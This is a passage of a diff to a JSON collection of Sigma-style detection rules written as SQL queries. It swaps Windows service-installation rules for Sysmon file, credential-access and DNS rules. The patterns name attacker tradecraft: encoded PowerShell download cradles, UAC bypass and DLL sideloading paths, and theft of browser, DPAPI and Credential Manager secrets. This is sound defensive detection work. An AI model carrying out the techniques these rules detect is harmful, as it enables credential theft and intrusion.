'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE 
'\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local 
Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", + "status": "experimental", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": 
"54127bd4-f541-4ac3-afdb-ea073f63f692", + "status": "experimental", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' 
ESCAPE '\\'))))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", + "falsepositives": [ + "Application installation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "file_rename_win_not_dll_to_dll.yml" + }, + { + "title": "Suspicious 
Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "status": "experimental", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" + ], + "falsepositives": [ + "Backup software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + ], + "filename": "file_rename_win_ransomware.yml" + }, + { + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity 
related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath 
LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "Tap 
Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((Image = 'System' AND ParentImage = 'Idle') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image 
LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::cred\" function\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": 
"experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. 
It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 
'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + 
